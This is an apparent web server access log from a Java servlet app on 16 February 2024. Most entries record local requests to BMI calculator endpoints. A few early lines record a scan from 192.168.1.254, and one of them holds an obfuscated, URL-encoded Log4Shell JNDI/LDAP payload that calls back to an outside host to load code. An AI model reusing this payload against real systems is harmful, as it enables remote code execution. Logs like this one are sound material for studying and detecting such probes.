192.168.1.254 - - [16/Feb/2024:09:12:39 -0600] "OPTIONS rtsp://192.168.1.205/ RTSP/1.0" 505 - null 0
192.168.1.254 - - [16/Feb/2024:09:12:39 -0600] "POST /onvif/device_service HTTP/1.1" 404 - http-bio-8080-exec-5 0
192.168.1.254 - - [16/Feb/2024:09:12:49 -0600] "GET / HTTP/1.1" 404 - http-bio-8080-exec-6 0
192.168.1.254 - - [16/Feb/2024:09:12:49 -0600] "GET /%24%7Bj%24%7Benv%3ATEST%3A-n%7D%24%7Blower%3Ad%7Di%24%7B%3A%3A-%3A%7D%24%7Blower%3Ad%7D%24%7Blower%3An%7D%24%7Blower%3As%7D%3A%2F%2F192.168.1.254%3A46285%2FJqgzvTnrFdjzrKcmmNZvIOthDpQwePIW%7D HTTP/1.1" 400 - http-bio-8080-exec-8 0
192.168.1.254 - - [16/Feb/2024:09:12:59 -0600] "POST / HTTP/1.1" 404 - http-bio-8080-exec-9 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:06:45 -0600] "GET /javax-servlets HTTP/1.1" 302 - http-bio-8080-exec-7 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:06:45 -0600] "GET /javax-servlets/ HTTP/1.1" 200 372 http-bio-8080-exec-7 441
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:06:46 -0600] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-7 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:10:00 -0600] "GET /javax-servlets HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:10:00 -0600] "GET /javax-servlets/ HTTP/1.1" 200 372 http-bio-8080-exec-2 122
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:10:13 -0600] "GET /javax-servlets/BMIRest HTTP/1.1" 404 949 http-bio-8080-exec-2 88
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:13:13 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-10 129
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:15:12 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-1 23
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:15:23 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-1 32
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:18:21 -0600] "POST /javax-servlets/ HTTP/1.1" 405 1047 http-bio-8080-exec-8 98
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:18:51 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-8 8
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:18:59 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-8 27
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:20:01 -0600] "POST /javax-servlets/bmi HTTP/1.1" 200 163 http-bio-8080-exec-7 133
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:20:08 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-7 6
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:21:07 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-7 17
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:22:06 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-7 8
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:58:46 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-9 103
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:59:18 -0600] "GET /javax-servlets HTTP/1.1" 302 - http-bio-8080-exec-8 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:59:18 -0600] "GET /javax-servlets/ HTTP/1.1" 200 372 http-bio-8080-exec-8 86
0:0:0:0:0:0:0:1 - - [16/Feb/2024:13:59:29 -0600] "POST /javax-servlets/bmi HTTP/1.1" 200 164 http-bio-8080-exec-8 77
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:00:17 -0600] "GET /javax-servlets HTTP/1.1" 302 - http-bio-8080-exec-6 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:00:17 -0600] "GET /javax-servlets/ HTTP/1.1" 200 372 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:00:25 -0600] "POST /javax-servlets/bmi HTTP/1.1" 200 164 http-bio-8080-exec-6 48
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:00:32 -0600] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-6 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:01:03 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:03:29 -0600] "GET /javax-servlets HTTP/1.1" 302 - http-bio-8080-exec-9 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:03:29 -0600] "GET /javax-servlets/ HTTP/1.1" 200 372 http-bio-8080-exec-3 78
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:11:32 -0600] "GET /javax-servlets HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:11:32 -0600] "GET /javax-servlets/ HTTP/1.1" 200 372 http-bio-8080-exec-4 77
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:11:55 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-8 16
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:16:37 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-2 73
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:17:17 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 404 949 http-bio-8080-exec-2 11
0:0:0:0:0:0:0:1 - - [16/Feb/2024:14:24:54 -0600] "POST /javax-servlets/bmirest HTTP/1.1" 200 5 http-bio-8080-exec-2 542
